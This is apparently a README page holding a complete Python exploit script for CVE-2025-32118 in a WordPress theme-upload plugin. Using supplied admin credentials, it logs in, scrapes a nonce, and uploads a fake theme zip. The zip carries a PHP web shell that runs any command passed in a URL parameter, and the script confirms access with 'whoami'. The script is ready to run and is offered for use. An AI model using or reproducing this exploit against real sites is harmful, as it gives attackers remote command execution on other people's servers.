README.md
Rendering markdown...
import requests
import zipfile
import os
import argparse
from bs4 import BeautifulSoup
# Exploit By : Nxploited | Khaled Alenazi,
def create_zip(zip_name):
theme_dir = "nxploitedshell"
os.makedirs(theme_dir, exist_ok=True)
with open(os.path.join(theme_dir, "style.css"), "w") as f:
f.write("/*\nTheme Name: Nxploited\nDescription: Educational exploit\n*/")
with open(os.path.join(theme_dir, "nxploitedshell.php"), "w") as f:
f.write("<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>")
with zipfile.ZipFile(zip_name, 'w') as zipf:
for root, _, files in os.walk(theme_dir):
for file in files:
full_path = os.path.join(root, file)
arcname = os.path.relpath(full_path, os.path.dirname(theme_dir))
zipf.write(full_path, arcname)
for file in os.listdir(theme_dir):
os.remove(os.path.join(theme_dir, file))
os.rmdir(theme_dir)
def login(session, url, username, password, headers):
login_url = f"{url}/wp-login.php"
data = {
"log": username,
"pwd": password,
"rememberme": "forever",
"wp-submit": "Log In"
}
response = session.post(login_url, data=data, headers=headers)
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
print("[+] Logged in successfully.")
return True
print("[-] Login failed.")
return False
def get_nonce(session, url, headers):
target = f"{url}/wp-admin/admin.php?page=cmp-upload-theme"
try:
response = session.get(target, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
nonce_input = soup.find("input", {"name": "save_options_field"})
if nonce_input:
nonce = nonce_input["value"]
print(f"[+] Nonce extracted: {nonce}")
return nonce
except Exception as e:
print(f"[-] Failed to extract nonce: {e}")
return None
def upload_zip(session, url, nonce, headers, zip_path):
post_url = f"{url}/wp-admin/admin.php?page=cmp-settings"
files = {
"fileToUpload": ("Nxploited.zip", open(zip_path, "rb"), "application/zip")
}
data = {
"save_options_field": nonce,
"_wp_http_referer": "/wordpress/wp-admin/admin.php?page=cmp-upload-theme",
"submit_theme": "Install Theme"
}
response = session.post(post_url, headers=headers, files=files, data=data)
if "was successfully installed" in response.text:
print("[+] Exploit uploaded successfully.")
return True
print("[-] Upload failed.")
return False
def check_shell(url):
shell_url = f"{url}/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=whoami"
try:
response = requests.get(shell_url, timeout=10)
if response.status_code == 200:
print(f"[+] Shell is accessible: {shell_url}")
print(f"[+] Response: {response.text.strip()}")
else:
print("[-] Shell not accessible.")
except Exception as e:
print(f"[-] Target is unreachable or shell failed: {e}")
def banner():
print("Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi")
def main():
parser = argparse.ArgumentParser(description="Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi")
parser.add_argument("-u", "--url", required=True, help="Base URL of WordPress site")
parser.add_argument("-un", "--username", required=True, help="Admin username")
parser.add_argument("-p", "--password", required=True, help="Admin password")
args = parser.parse_args()
zip_name = "Nxploited.zip"
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"}
session = requests.Session()
session.verify = False
requests.packages.urllib3.disable_warnings()
banner()
create_zip(zip_name)
if not login(session, args.url, args.username, args.password, headers):
return
nonce = get_nonce(session, args.url, headers)
if not nonce:
return
if upload_zip(session, args.url, nonce, headers, zip_name):
check_shell(args.url)
if __name__ == "__main__":
main()